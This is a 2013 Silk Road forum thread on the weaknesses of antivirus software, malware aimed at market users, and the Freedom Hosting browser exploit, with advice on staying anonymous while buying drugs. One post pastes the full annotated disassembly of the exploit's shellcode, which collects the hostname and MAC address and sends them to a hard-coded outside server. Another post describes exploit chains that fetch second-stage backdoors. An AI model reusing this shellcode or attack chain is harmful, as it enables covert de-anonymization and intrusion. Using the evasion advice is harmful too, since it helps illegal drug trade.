Silk Road forums

Discussion => Security => Topic started by: astor on June 19, 2013, 02:16 am

Title: A warning about antivirus programs
Post by: astor on June 19, 2013, 02:16 am
They're crap. They don't work. If you use Windows, you should make a rescue disk now, because if you get infected with malware, the only way to be sure you get rid of it is to format the hard drive and do a clean reinstall of the OS.


Remember when a bunch of people got messages on SR saying that someone had recorded them getting drugs out of their mailbox, and they could view the video on some site? The site had a Java app that turned out to be malware.

At the time, someone in our community clicked the Java app and got infected. He asked me what to do. I told him to format the hard drive and do a clean reinstall. He didn't listen to me, and instead spent 3 days removing the malware.

Or so he thought.

Today this person told me that he got the password reset for his SR account. I didn't know he had to reset his password, but he should have been suspicious from that alone, although he never mentioned it to me. When he logged in, all his BTC had been withdrawn. It was not a trivial amount of BTC.  While talking to him, he rescanned his computer and found more malware. I experienced this myself when I infected a WinXP VM on purpose with the Trojan downloader on that site, "cleaned" it with an antivirus program, rebooted it and found the same rootkits.

Since the malware came from someone targeting SR users, he got infected with it, and his account was later compromised, it is very like this is the thing that stole his login credentials. He adamantly denies it could have been a phishing site or other things, but in my experience, when people are 100% sure about something, that it absolutely could not have been something, most of the time they are wrong.

Anyway, all this could have been avoided if he had done a clean reinstall.
Title: Re: A warning about antivirus programs
Post by: astor on June 19, 2013, 02:26 am
Let me be more clear. You should make an actual disk, on read-only media, because a rescue partition can be infected too.
Title: Re: A warning about antivirus programs
Post by: SelfSovereignty on June 19, 2013, 02:34 am
Er... well actually, that depends on your BIOS these days I believe.  RootKits are nasty, don't get me wrong, but if you've got a newer BIOS that supports UEFI and SecureBoot... this scenario shouldn't be possible.

If you don't have a Windows 8 computer, you most likely do not have UEFI and/or SecureBoot.  Note that I've never tested that SecureBoot really does work, but it *is* what they made it for (ostensibly), so I should hope it does...

Oh, yeah... as for Java: don't just disable it.  If you don't actively use it, just outright uninstall the entire JRE or JDK (runtime environment / developer's kit).  BTW: how the Hell did a Java app execute from the Tor browser, anyway?
Title: Re: A warning about antivirus programs
Post by: astor on June 19, 2013, 02:47 am
Er... well actually, that depends on your BIOS these days I believe.  RootKits are nasty, don't get me wrong, but if you've got a newer BIOS that supports UEFI and SecureBoot... this scenario shouldn't be possible.

Yeah, that's true. Good point. Secure Boot should help.

Unfortunately, it's a pain for other reasons, like installing alternative operating systems. It also may not be turned on by default. I believe Microsoft only mandated it on devices with ARM processors (ie, running Windows RT). In other cases, the computer vendor is free to choose.

Quote
Oh, yeah... as for Java: don't just disable it.  If you don't actively use it, just outright uninstall the entire JRE or JDK (runtime environment / developer's kit).  BTW: how the Hell did a Java app execute from the Tor browser, anyway?

Not sure. TorBrowser is supposed to be isolated to the folder it is extracted to, so it shouldn't know that Java is installed. That may only be the case for the Linux version.
Title: Re: A warning about antivirus programs
Post by: Jack N Hoff on June 19, 2013, 02:51 am
Oh, I was in the chat with that guy.  I didn't realize that he was one of the people that went to that URL.

Sucks :(
Title: Re: A warning about antivirus programs
Post by: royalblue on June 19, 2013, 02:52 am
Like SS said, no Java in TorBrowser and JS can't deliver malware without the user clicking Run in a dialog.  Lesson: People need to be mindful of what they are clicking.

Everyone should set their NoScript to NOT Allow Scripts Globally (this is the TBB default so if you haven't manually changed it you need to). Then enable it on trustworthy sites like the forums.  SR itself does not require JS to function.

And since we are talking about potentially custom-created spyware/malware that targets SR users, reformatting/reinstalling is probably good advice.
Title: Re: A warning about antivirus programs
Post by: royalblue on June 19, 2013, 03:18 am
Oh, yeah... as for Java: don't just disable it.  If you don't actively use it, just outright uninstall the entire JRE or JDK (runtime environment / developer's kit).  BTW: how the Hell did a Java app execute from the Tor browser, anyway?

Not sure. TorBrowser is supposed to be isolated to the folder it is extracted to, so it shouldn't know that Java is installed. That may only be the case for the Linux version.

To be exact, TBB should not be able to interact with the JVM/JRE without the Firefox/TBB Java plugin.  This plugin should not be installed, nor should any.

For those that don't know, type this in your address bar:
Code: [Select]
about:plugins
There shouldn't be any plugins installed.
Title: Re: A warning about antivirus programs
Post by: astor on June 19, 2013, 03:21 am
Oh right, I overlooked the obvious. Like a lot of people unfortunately, he probably copied the clearnet link to a regular browser.
Title: Re: A warning about antivirus programs
Post by: fartsinthewind on June 19, 2013, 05:40 am
most of this stuff is over my head, but I have a pretty good grasp of tor and pgp. I have recently been thinking about purchasing a cheap used laptop and just using it for usb-based VM platform tor browsing at public wifi spots. The problem is, no matter how secure you are technologically, the weakest link is the physical exchange of goods. You have to receive somewhere, on some regularity. Pattern recognition is how LE targets suspects, and unfortunately that's unavoidable.

Thoughts?
Title: Re: A warning about antivirus programs
Post by: astor on June 19, 2013, 05:46 am
fartsinthewind, yeah receiving drugs is the riskiest part. Check out the SR Risk Analysis for Buyers thread, that's exactly what we're talking about there.
Title: Re: A warning about antivirus programs
Post by: kmfkewm on June 19, 2013, 09:43 am
They're crap. They don't work. If you use Windows, you should make a rescue disk now, because if you get infected with malware, the only way to be sure you get rid of it is to format the hard drive and do a clean reinstall of the OS.

In the vast majority of cases you are correct, but technically even wiping the drive and doing a clean install of the OS is not enough to ensure you have removed all malware. In many cases it is possible for malware to infect your video card, your mouse, your keyboard and anything else that has reflashable or persistent memory on it. Some mouses these days have their own CPU's and on board memory! In such a case it is possible to have a totally cleaned drive and freshly installed OS, and to get reinfected via your infected peripherals and other hardware.
 
Quote
JS can't deliver malware without the user clicking Run in a dialog

Javascript can be used to deliver malware via browser exploits.

Title: Re: A warning about antivirus programs
Post by: SelfSovereignty on June 19, 2013, 11:55 am
They're crap. They don't work. If you use Windows, you should make a rescue disk now, because if you get infected with malware, the only way to be sure you get rid of it is to format the hard drive and do a clean reinstall of the OS.

In the vast majority of cases you are correct, but technically even wiping the drive and doing a clean install of the OS is not enough to ensure you have removed all malware. In many cases it is possible for malware to infect your video card, your mouse, your keyboard and anything else that has reflashable or persistent memory on it. Some mouses these days have their own CPU's and on board memory! In such a case it is possible to have a totally cleaned drive and freshly installed OS, and to get reinfected via your infected peripherals and other hardware.

I'm not claiming that this isn't possible, but honestly if you aren't dealing with international espionage, nuclear secrets, and/or governments that buy up zero days like there's no tomorrow... I really, really don't think you have to worry about this.  We have a lot of paranoid people about -- I personally don't feel that the vast majority of users should even consider this possibility (as in for most it's a level of paranoia that will hinder your safety, not help it)... but again, I'm not claiming this isn't possible and I don't really know how many people have instructions to build WMDs sitting around as icons on their desktop, so who knows... :)

Quote
Quote
JS can't deliver malware without the user clicking Run in a dialog

Javascript can be used to deliver malware via browser exploits.

Anything that actually modifies the state of the machine has the potential to be used as an exploit.  You don't always have to execute code or evaluate a script to get machine code loaded into main memory; just reading data from a site can be enough (i.e. buffer overrun kind of thing).  It's not likely, of course, but it's possible.  Whether you should worry about it or not depends on how badly you think they wanna catch you.

Do you make DPR look like Mother Theresa?  Then yeah, I'd start worrying about it.

Not the kingpin of several international child slavery organizations?  Eh, have a cup o' tea and relax a spell... :)
Title: Re: A warning about antivirus programs
Post by: royalblue on June 19, 2013, 03:22 pm
Quote
JS can't deliver malware without the user clicking Run in a dialog

Javascript can be used to deliver malware via browser exploits.
True, doesn't seem to be the case here though.
Title: Re: A warning about antivirus programs
Post by: MrBlack999 on August 11, 2013, 05:10 am
How in the hell do you make a rescue disk and wouldnt the recovery disk/drive be infected with the trojan/rootkit?


Mr.Black
Title: Re: A warning about antivirus programs
Post by: spectrum on August 11, 2013, 05:19 am
It could be if you make the rescue disk after you are infected, but that's why you should make one right when you buy a new computer.
Title: Re: A warning about antivirus programs
Post by: MrBlack999 on August 11, 2013, 05:31 am
I fucking hate my life now....


Mr.Black
Title: Re: A warning about antivirus programs
Post by: kmfkewm on August 11, 2013, 05:46 am
Quote
Quote
Quote
JS can't deliver malware without the user clicking Run in a dialog

Javascript can be used to deliver malware via browser exploits.

Anything that actually modifies the state of the machine has the potential to be used as an exploit.  You don't always have to execute code or evaluate a script to get machine code loaded into main memory; just reading data from a site can be enough (i.e. buffer overrun kind of thing).  It's not likely, of course, but it's possible.  Whether you should worry about it or not depends on how badly you think they wanna catch you.

Do you make DPR look like Mother Theresa?  Then yeah, I'd start worrying about it.

Not the kingpin of several international child slavery organizations?  Eh, have a cup o' tea and relax a spell... :)

Apparently just visiting sites on the same server as CP is enough.
Title: Re: A warning about antivirus programs
Post by: kmfkewm on August 11, 2013, 05:47 am
Quote
JS can't deliver malware without the user clicking Run in a dialog

Javascript can be used to deliver malware via browser exploits.
True, doesn't seem to be the case here though.

Doesn't seem to be the case where? It just happened to anybody who visited any site hosted by freedom hosting.
Title: Re: A warning about antivirus programs
Post by: astor on August 11, 2013, 05:52 am
Quote
JS can't deliver malware without the user clicking Run in a dialog

Javascript can be used to deliver malware via browser exploits.

And once again how prescient that was.

In retrospect, this was the first remote execution vulnerability to be used against Tor users, it just wasn't as obvious because the people who got pwned copied the link into a regular browser.

Ironically, I used a disposable Win XP VM to look at and identify the malware in this case without getting pwned.
Title: Re: A warning about antivirus programs
Post by: kmfkewm on August 11, 2013, 05:57 am
Quote
JS can't deliver malware without the user clicking Run in a dialog

Javascript can be used to deliver malware via browser exploits.

And once again how prescient that was.

In retrospect, this was the first remote execution vulnerability to be used against Tor users, it just wasn't as obvious because the people who got pwned copied the link into a regular browser.

Ironically, I used a disposable Win XP VM to look at and identify the malware in this case without getting pwned.

I have a contact who has been analyzing the malware, he tested it multiple times with Win XP and it was hit or miss in regards to if it worked or not. From an article I read from other hackers who analyzed it, some of it was specific to Windows 7, so on other versions of Windows it had a lower probability of actually working whereas on Windows 7 it had a high probability of working.

You really had to have the perfect storm of fuck ups to be compromised by this. Old version of Tor Browser, javascript enabled, on Windows and especially Windows 7, without isolation of the browser, without a VPN (although VPN would only help you somewhat), without firewall rules.
Title: Re: A warning about antivirus programs
Post by: jampants on August 11, 2013, 06:23 am
I'm sorry but you guys are 5-10 years behind where the bleeding edge of Malware is at the moment. And I'm not just talking about another fucking Slavik ZuESS bot/trojan or some dumb Chinese APT threat. Go study the FLAME malware and you will understand how much of a beautiful piece of work it was, MD5 collision attack using new cryptographic attacks to break windows update.

A Java 0-day is simple compared to some of the attacks out there but unless you piss off a few certain people or a 3 letter agency you don't have much to worry about. What you do have to worry about is fucktard's like VUPEN selling exploit kits to LEA to target certain user's as I'm sure the FH job was done using a exploit kit made by a contractor.
Title: Re: A warning about antivirus programs
Post by: kmfkewm on August 11, 2013, 06:30 am
I'm sorry but you guys are 5-10 years behind where the bleeding edge of Malware is at the moment. And I'm not just talking about another fucking Slavik ZuESS bot/trojan or some dumb Chinese APT threat. Go study the FLAME malware and you will understand how much of a beautiful piece of work it was, MD5 collision attack using new cryptographic attacks to break windows update.

A Java 0-day is simple compared to some of the attacks out there but unless you piss off a few certain people or a 3 letter agency you don't have much to worry about. What you do have to worry about is fucktard's like VUPEN selling exploit kits to LEA to target certain user's as I'm sure the FH job was done using a exploit kit made by a contractor.

We are 5-10 years behind or the feds are? If the NSA did this attack (and gave it their all) it would have found a way to fingerprint the OS people were using and target a specific payload to them, that then fingerprinted its environment to see if there was isolation or other security techniques, and then obtained other payloads to break through the isolation and disable each layer of security one at a time, prior to sending the information back to them. And it would have all been zero days, obfuscated and encrypted and probably never would have been detected in the first place.

The FBI used a month old javascript exploit to deliver a payload that was targeted specifically to Windows 7 and to a lesser extent Windows in general, and it didn't even attempt to break out of isolation or disable any security features. The NSA has fucking cyber missles essentially, they will blow their way through ten layers of isolation in the blink of an eye. The FBI has always used already patched exploits, I have never read of a case where they did an attack like this with an actual 0-day, let alone tried to break out of layers of security.

Quote
Chinese APT threat

A Chinese advanced persistent threat threat ;)?
Title: Re: A warning about antivirus programs
Post by: jampants on August 11, 2013, 07:00 am


A Chinese advanced persistent threat threat ;)?

yes yes yum cha malware
Title: Re: A warning about antivirus programs
Post by: royalblue on August 11, 2013, 02:54 pm
Quote
JS can't deliver malware without the user clicking Run in a dialog

Javascript can be used to deliver malware via browser exploits.
True, doesn't seem to be the case here though.

Doesn't seem to be the case where? It just happened to anybody who visited any site hosted by freedom hosting.

The OP discusses malware downloaded via JAVA app exploit. A JS exploit did not seem to be the case based on the information provided in the OP.  I stand by that statement.

Freedom hosting is a different story, obviously it was a js exploit but I've seen no evidence that there was malware delivered by javascript as you are contending.  It was an exploit made possible by javascript.  Where's the malware???
Title: Re: A warning about antivirus programs
Post by: kmfkewm on August 11, 2013, 03:31 pm
Quote
JS can't deliver malware without the user clicking Run in a dialog

Javascript can be used to deliver malware via browser exploits.
True, doesn't seem to be the case here though.

Doesn't seem to be the case where? It just happened to anybody who visited any site hosted by freedom hosting.

The OP discusses malware downloaded via JAVA app exploit. A JS exploit did not seem to be the case based on the information provided in the OP.  I stand by that statement.

Freedom hosting is a different story, obviously it was a js exploit but I've seen no evidence that there was malware delivered by javascript as you are contending.  It was an exploit made possible by javascript.  Where's the malware???

The malware is what gathered users hostname and MAC and sent it back to their server outside of Tor. It was delivered via a javascript exploit. They could have delivered any payload they wanted.
Title: Re: A warning about antivirus programs
Post by: kmfkewm on August 11, 2013, 03:44 pm
more specifically, here is the malware:

Quote
00000000  60                pusha
00000001  FC                cld
00000002  E88A000000        call 0x91
00000007  60                pusha # win32 function resolver by @stephenfewer, used by Metasploit
00000008  89E5              mov ebp,esp
0000000A  31D2              xor edx,edx
0000000C  648B5230          mov edx,[fs:edx+0x30]
00000010  8B520C            mov edx,[edx+0xc]
00000013  8B5214            mov edx,[edx+0x14]
00000016  8B7228            mov esi,[edx+0x28]
00000019  0FB74A26          movzx ecx,word [edx+0x26]
0000001D  31FF              xor edi,edi
0000001F  31C0              xor eax,eax
00000021  AC                lodsb
00000022  3C61              cmp al,0x61
00000024  7C02              jl 0x28
00000026  2C20              sub al,0x20
00000028  C1CF0D            ror edi,0xd
0000002B  01C7              add edi,eax
0000002D  E2F0              loop 0x1f
0000002F  52                push edx
00000030  57                push edi
00000031  8B5210            mov edx,[edx+0x10]
00000034  8B423C            mov eax,[edx+0x3c]
00000037  01D0              add eax,edx
00000039  8B4078            mov eax,[eax+0x78]
0000003C  85C0              test eax,eax
0000003E  744A              jz 0x8a
00000040  01D0              add eax,edx
00000042  50                push eax
00000043  8B4818            mov ecx,[eax+0x18]
00000046  8B5820            mov ebx,[eax+0x20]
00000049  01D3              add ebx,edx
0000004B  E33C              jecxz 0x89
0000004D  49                dec ecx
0000004E  8B348B            mov esi,[ebx+ecx*4]
00000051  01D6              add esi,edx
00000053  31FF              xor edi,edi
00000055  31C0              xor eax,eax
00000057  AC                lodsb
00000058  C1CF0D            ror edi,0xd
0000005B  01C7              add edi,eax
0000005D  38E0              cmp al,ah
0000005F  75F4              jnz 0x55
00000061  037DF8            add edi,[ebp-0x8]
00000064  3B7D24            cmp edi,[ebp+0x24]
00000067  75E2              jnz 0x4b
00000069  58                pop eax
0000006A  8B5824            mov ebx,[eax+0x24]
0000006D  01D3              add ebx,edx
0000006F  668B0C4B          mov cx,[ebx+ecx*2]
00000073  8B581C            mov ebx,[eax+0x1c]
00000076  01D3              add ebx,edx
00000078  8B048B            mov eax,[ebx+ecx*4]
0000007B  01D0              add eax,edx
0000007D  89442424          mov [esp+0x24],eax
00000081  5B                pop ebx
00000082  5B                pop ebx
00000083  61                popa
00000084  59                pop ecx
00000085  5A                pop edx
00000086  51                push ecx
00000087  FFE0              jmp eax
00000089  58                pop eax
0000008A  5F                pop edi
0000008B  5A                pop edx
0000008C  8B12              mov edx,[edx]
0000008E  EB86              jmp short 0x16
00000090  skipping 0x1 bytes
00000091  5D                pop ebp
00000092  81BDE90200004745  cmp dword [ebp+0x2e9],0x20544547 # "GET "
         -5420
0000009C  7570              jnz 0x10e
0000009E  8D85D1020000      lea eax,[ebp+0x2d1] "ws2_32"
000000A4  50                push eax
000000A5  684C772607        push dword 0x726774c # LoadLibraryA
000000AA  FFD5              call ebp
000000AC  85C0              test eax,eax
000000AE  745E              jz 0x10e
000000B0  8D85D8020000      lea eax,[ebp+0x2d8] "IPHLPAPI"
000000B6  50                push eax
000000B7  684C772607        push dword 0x726774c # LoadLibraryA
000000BC  FFD5              call ebp # ebp = find function
000000BE  85C0              test eax,eax
000000C0  744C              jz 0x10e
000000C2  BB90010000        mov ebx,0x190
000000C7  29DC              sub esp,ebx
000000C9  54                push esp
000000CA  53                push ebx
000000CB  6829806B00        push dword 0x6b8029 # WSAStartupA
000000D0  FFD5              call ebp
000000D2  01DC              add esp,ebx
000000D4  85C0              test eax,eax
000000D6  7536              jnz 0x10e
000000D8  50                push eax
000000D9  50                push eax
000000DA  50                push eax
000000DB  50                push eax
000000DC  40                inc eax
000000DD  50                push eax
000000DE  40                inc eax
000000DF  50                push eax
000000E0  68EA0FDFE0        push dword 0xe0df0fea # WSASocketA
000000E5  FFD5              call ebp
000000E7  31DB              xor ebx,ebx
000000E9  F7D3              not ebx
000000EB  39C3              cmp ebx,eax
000000ED  741F              jz 0x10e
000000EF  89C3              mov ebx,eax
000000F1  6A10              push byte +0x10
000000F3  8DB5E1020000      lea esi,[ebp+0x2e1] # struct sockaddr_in { AF_INET, 80, 65.222.202.54 }
000000F9  56                push esi
000000FA  53                push ebx
000000FB  6899A57461        push dword 0x6174a599 # connect
00000100  FFD5              call ebp
00000102  85C0              test eax,eax
00000104  741F              jz 0x125
00000106  FE8D89000000      dec byte [ebp+0x89] # Try to connect 5 times
0000010C  75E3              jnz 0xf1
0000010E  80BD4F02000001    cmp byte [ebp+0x24f],0x1
00000115  7407              jz 0x11e
00000117  E83B010000        call 0x257
0000011C  EB05              jmp short 0x123
0000011E  E84D010000        call 0x270
00000123  FFE7              jmp edi
00000125  B800010000        mov eax,0x100
0000012A  29C4              sub esp,eax
0000012C  89E2              mov edx,esp
0000012E  52                push edx
0000012F  50                push eax
00000130  52                push edx
00000131  68B649DE01        push dword 0x1de49b6 # gethostname
00000136  FFD5              call ebp
00000138  5F                pop edi
00000139  81C400010000      add esp,0x100
0000013F  85C0              test eax,eax
00000141  0F85F2000000      jnz near 0x239
00000147  57                push edi
00000148  E8F9000000        call 0x246 # strlen of gethostname
0000014D  5E                pop esi
0000014E  89CA              mov edx,ecx
00000150  8DBDE9020000      lea edi,[ebp+0x2e9]
00000156  E8EB000000        call 0x246 # strlen (to move EDI to the NULL byte at the end of the HTTP string)
0000015B  4F                dec edi
0000015C  83FA20            cmp edx,byte +0x20
0000015F  7C05              jl 0x166
00000161  BA20000000        mov edx,0x20
00000166  89D1              mov ecx,edx
00000168  56                push esi
00000169  F3A4              rep movsb
0000016B  B90D000000        mov ecx,0xd
00000170  8DB5C4020000      lea esi,[ebp+0x2c4] "\r\nCookie: ID="
00000176  F3A4              rep movsb
00000178  89BD4B020000      mov [ebp+0x24b],edi
0000017E  5E                pop esi
0000017F  56                push esi
00000180  68A9283480        push dword 0x803428a9 # gethostbyname
00000185  FFD5              call ebp
00000187  85C0              test eax,eax
00000189  0F84AA000000      jz near 0x239
0000018F  668B480A          mov cx,[eax+0xa]
00000193  6683F904          cmp cx,byte +0x4
00000197  0F829C000000      jc near 0x239
0000019D  8D400C            lea eax,[eax+0xc]
000001A0  8B00              mov eax,[eax]
000001A2  8B08              mov ecx,[eax]
000001A4  8B09              mov ecx,[ecx]
000001A6  B800010000        mov eax,0x100
000001AB  50                push eax
000001AC  89E7              mov edi,esp
000001AE  29C4              sub esp,eax
000001B0  89E6              mov esi,esp
000001B2  57                push edi
000001B3  56                push esi
000001B4  51                push ecx
000001B5  51                push ecx
000001B6  684872D2B8        push dword 0xb8d27248 # iphlpapi.dll!SendARP
000001BB  FFD5              call ebp
000001BD  85C0              test eax,eax
000001BF  81C404010000      add esp,0x104
000001C5  0FB70F            movzx ecx,word [edi]
000001C8  83F906            cmp ecx,byte +0x6
000001CB  726C              jc 0x239
000001CD  B906000000        mov ecx,0x6
000001D2  B810000000        mov eax,0x10
000001D7  29C4              sub esp,eax
000001D9  89E7              mov edi,esp
000001DB  89CA              mov edx,ecx
000001DD  D1E2              shl edx,1
000001DF  50                push eax
000001E0  52                push edx
000001E1  31D2              xor edx,edx
000001E3  8A16              mov dl,[esi]
000001E5  88D0              mov al,dl
000001E7  24F0              and al,0xf0 # It actually turns the raw data into hex strings before appending it to the HTTP header
000001E9  C0E804            shr al,0x4
000001EC  3C09              cmp al,0x9
000001EE  7704              ja 0x1f4
000001F0  0430              add al,0x30
000001F2  EB02              jmp short 0x1f6
000001F4  0437              add al,0x37
000001F6  8807              mov [edi],al
000001F8  47                inc edi
000001F9  88D0              mov al,dl
000001FB  240F              and al,0xf
000001FD  3C09              cmp al,0x9
000001FF  7704              ja 0x205
00000201  0430              add al,0x30
00000203  EB02              jmp short 0x207
00000205  0437              add al,0x37
00000207  8807              mov [edi],al
00000209  47                inc edi
0000020A  46                inc esi
0000020B  E2D4              loop 0x1e1
0000020D  59                pop ecx
0000020E  29CF              sub edi,ecx
00000210  89FE              mov esi,edi
00000212  58                pop eax
00000213  01C4              add esp,eax
00000215  8BBD4B020000      mov edi,[ebp+0x24b]
0000021B  F3A4              rep movsb
0000021D  C6854F02000001    mov byte [ebp+0x24f],0x1
00000224  E82E000000        call 0x257 # Append "Connection: keep-alive\r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n" and return the new strlen(ebp + 0x2e9)
00000229  31C0              xor eax,eax
0000022B  50                push eax
0000022C  51                push ecx
0000022D  29CF              sub edi,ecx
0000022F  4F                dec edi
00000230  57                push edi
00000231  53                push ebx
00000232  68C2EB385F        push dword 0x5f38ebc2 # send
00000237  FFD5              call ebp
00000239  53                push ebx
0000023A  68756E4D61        push dword 0x614d6e75 # closesocket
0000023F  FFD5              call ebp
00000241  E9C8FEFFFF        jmp 0x10e
00000246  31C9              xor ecx,ecx
00000248  F7D1              not ecx
0000024A  31C0              xor eax,eax
0000024C  F2AE              repne scasb
0000024E  F7D1              not ecx
00000250  49                dec ecx
00000251  C3                ret
00000252  0000              add [eax],al
00000254  0000              add [eax],al
00000256  skipping 0x1 bytes
00000257  8DBDE9020000      lea edi,[ebp+0x2e9]
0000025D  E8E4FFFFFF        call 0x246
00000262  4F                dec edi
00000263  B94F000000        mov ecx,0x4f
00000268  8DB575020000      lea esi,[ebp+0x275]
0000026E  F3A4              rep movsb
00000270  8DBDE9020000      lea edi,[ebp+0x2e9]
00000276  E8CBFFFFFF        call 0x246
0000027B  C3                ret
0000027C  0D0A436F6E        or eax,0x6e6f430a
00000281  6E                outsb
00000282  656374696F        arpl [gs:ecx+ebp*2+0x6f],si
00000287  6E                outsb
00000288  3A20              cmp ah,[eax]
0000028A  6B656570          imul esp,[ebp+0x65],byte +0x70
0000028E  2D616C6976        sub eax,0x76696c61
00000293  650D0A416363      gs or eax,0x6363410a
00000299  657074            gs jo 0x310
0000029C  3A20              cmp ah,[eax]
0000029E  2A2F              sub ch,[edi]
000002A0  2A0D0A416363      sub cl,[0x6363410a]
000002A6  657074            gs jo 0x31d
000002A9  2D456E636F        sub eax,0x6f636e45
000002AE  64696E673A20677A  imul ebp,[fs:esi+0x67],dword 0x7a67203a
000002B6  69700D0A0D0A00    imul esi,[eax+0xd],dword 0xa0d0a
000002BD  83C70E            add edi,byte +0xe
000002C0  31C9              xor ecx,ecx
000002C2  F7D1              not ecx
000002C4  31C0              xor eax,eax
000002C6  F3AE              repe scasb
000002C8  4F                dec edi
000002C9  FFE7              jmp edi
000002CB  0D0A436F6F        or eax,0x6f6f430a
000002D0  6B69653A          imul ebp,[ecx+0x65],byte +0x3a
000002D4  204944            and [ecx+0x44],cl
000002D7  3D7773325F        cmp eax,0x5f327377
000002DC  3332              xor esi,[edx]
000002DE  004950            add [ecx+0x50],cl
000002E1  48                dec eax
000002E2  4C                dec esp
000002E3  50                push eax
000002E4  41                inc ecx
000002E5  50                push eax
000002E6  49                dec ecx
000002E7  0002              add [edx],al
000002E9  0000              add [eax],al
000002EB  50                push eax
000002EC  41                inc ecx
000002ED  DECA              fmulp st2
000002EF  3647              ss inc edi
000002F1  45                inc ebp
000002F2  54                push esp
000002F3  202F              and [edi],ch
000002F5  303563656134      xor [0x34616563],dh
000002FB  64652D39353164    gs sub eax,0x64313539
00000302  2D34303337        sub eax,0x37333034
00000307  2D62663866        sub eax,0x66386662
0000030C  2D66363930        sub eax,0x30393666
00000311  3535623237        xor eax,0x37326235
00000316  396262            cmp [edx+0x62],esp
00000319  204854            and [eax+0x54],cl
0000031C  54                push esp
0000031D  50                push eax
0000031E  2F                das
0000031F  312E              xor [esi],ebp
00000321  310D0A486F73      xor [0x736f480a],ecx
00000327  743A              jz 0x363
00000329  2000              and [eax],al
0000032B  0000              add [eax],al
0000032D  0000              add [eax],al
0000032F  0000              add [eax],al
00000331  0000              add [eax],al
00000333  0000              add [eax],al
00000335  0000              add [eax],al
00000337  0000              add [eax],al
00000339  0000              add [eax],al
0000033B  0000              add [eax],al
0000033D  0000              add [eax],al
0000033F  0000              add [eax],al
00000341  0000              add [eax],al
00000343  0000              add [eax],al
00000345  0000              add [eax],al
00000347  0000              add [eax],al
00000349  0000              add [eax],al
0000034B  0000              add [eax],al
0000034D  0000              add [eax],al
0000034F  0000              add [eax],al
00000351  0000              add [eax],al
00000353  0000              add [eax],al
00000355  0000              add [eax],al
00000357  0000              add [eax],al
00000359  0000              add [eax],al
0000035B  0000              add [eax],al
0000035D  0000              add [eax],al
0000035F  0000              add [eax],al
00000361  0000              add [eax],al
00000363  0000              add [eax],al
00000365  0000              add [eax],al
00000367  0000              add [eax],al
00000369  0000              add [eax],al
0000036B  0000              add [eax],al
0000036D  0000              add [eax],al
0000036F  0000              add [eax],al
00000371  0000              add [eax],al
00000373  0000              add [eax],al
00000375  0000              add [eax],al
00000377  0000              add [eax],al
00000379  0000              add [eax],al
0000037B  0000              add [eax],al
0000037D  0000              add [eax],al
0000037F  0000              add [eax],al
00000381  0000              add [eax],al
00000383  0000              add [eax],al
00000385  0000              add [eax],al
00000387  0000              add [eax],al
00000389  0000              add [eax],al
0000038B  0000              add [eax],al
0000038D  0000              add [eax],al
0000038F  0000              add [eax],al
00000391  0000              add [eax],al
00000393  0000              add [eax],al
00000395  0000              add [eax],al
00000397  0000              add [eax],al
00000399  0000              add [eax],al
0000039B  0000              add [eax],al
0000039D  0000              add [eax],al
0000039F  0000              add [eax],al
000003A1  0000              add [eax],al
000003A3  0000              add [eax],al
000003A5  0000              add [eax],al
000003A7  0000              add [eax],al
000003A9  0000              add [eax],al
000003AB  0000              add [eax],al
000003AD  0000              add [eax],al
000003AF  0000              add [eax],al
000003B1  0000              add [eax],al
000003B3  0000              add [eax],al
000003B5  0000              add [eax],al
000003B7  0000              add [eax],al
000003B9  0000              add [eax],al
000003BB  90                nop

Title: Re: A warning about antivirus programs
Post by: royalblue on August 11, 2013, 04:10 pm
Quote
JS can't deliver malware without the user clicking Run in a dialog

Javascript can be used to deliver malware via browser exploits.
True, doesn't seem to be the case here though.

Doesn't seem to be the case where? It just happened to anybody who visited any site hosted by freedom hosting.

The OP discusses malware downloaded via JAVA app exploit. A JS exploit did not seem to be the case based on the information provided in the OP.  I stand by that statement.

Freedom hosting is a different story, obviously it was a js exploit but I've seen no evidence that there was malware delivered by javascript as you are contending.  It was an exploit made possible by javascript.  Where's the malware???

The malware is what gathered users hostname and MAC and sent it back to their server outside of Tor. It was delivered via a javascript exploit. They could have delivered any payload they wanted.
If malware is defined as any computer instruction code designed for a malicious purpose then sure, you can call that malware.  It isn't possible for server-side javascript to execute a compiled piece of software locally without human interaction though.

In regards to the assembly code you quote.  Where was this encoded in the script?  Magneto?
Title: Re: A warning about antivirus programs
Post by: kmfkewm on August 11, 2013, 04:30 pm
Quote
JS can't deliver malware without the user clicking Run in a dialog

Javascript can be used to deliver malware via browser exploits.
True, doesn't seem to be the case here though.

Doesn't seem to be the case where? It just happened to anybody who visited any site hosted by freedom hosting.

The OP discusses malware downloaded via JAVA app exploit. A JS exploit did not seem to be the case based on the information provided in the OP.  I stand by that statement.

Freedom hosting is a different story, obviously it was a js exploit but I've seen no evidence that there was malware delivered by javascript as you are contending.  It was an exploit made possible by javascript.  Where's the malware???

The malware is what gathered users hostname and MAC and sent it back to their server outside of Tor. It was delivered via a javascript exploit. They could have delivered any payload they wanted.
If malware is defined as any computer instruction code designed for a malicious purpose then sure, you can call that malware.  It isn't possible for server-side javascript to execute a compiled piece of software locally without human interaction though.

In regards to the assembly code you quote.  Where was this encoded in the script?  Magneto?

It is entirely possible for server-side javascript to cause a compiled piece of software to be executed on a remote machine, via a browser exploit. This assembly code could have very well been used to download a secondary payload from a FBI server, the secondary payload could have been a program written in C, and after it downloaded it then it could have executed it and infected the system with a persistent backdoor. That is very common for hackers to do, javascript exploit to inject assembly code into the target computers memory and execute it, assembly code downloads secondary payload from the internet and executes it. The FBI didn't do that because they didn't need to and might have been restricted by the court from doing so, and instead they just used an assembly program that gathers mac address and hostname and sends it to a server outside of Tor.

Yeah it was encoded in Magneto. I would call it malware because it compromised user security. I don't know what your definition of malware is, but if it requires a persistent infection then it could have been delivered by this attack as well, magneto would have just downloaded a secondary more complex compiled program and executed it.
Title: Re: A warning about antivirus programs
Post by: kmfkewm on August 11, 2013, 04:33 pm
Just as a side discussion, I think it is kind of shocking how many javascript developers I meet who think that javascript can absolutely not be used to infect computers, that it is totally safe, cannot cause malware infections, etc. It is a really common belief apparently, and it is weird considering that an enormous number of the attacks against browsers are javascript based.
Title: Re: A warning about antivirus programs
Post by: royalblue on August 11, 2013, 05:38 pm
Quote
JS can't deliver malware without the user clicking Run in a dialog

Javascript can be used to deliver malware via browser exploits.
True, doesn't seem to be the case here though.

Doesn't seem to be the case where? It just happened to anybody who visited any site hosted by freedom hosting.

The OP discusses malware downloaded via JAVA app exploit. A JS exploit did not seem to be the case based on the information provided in the OP.  I stand by that statement.

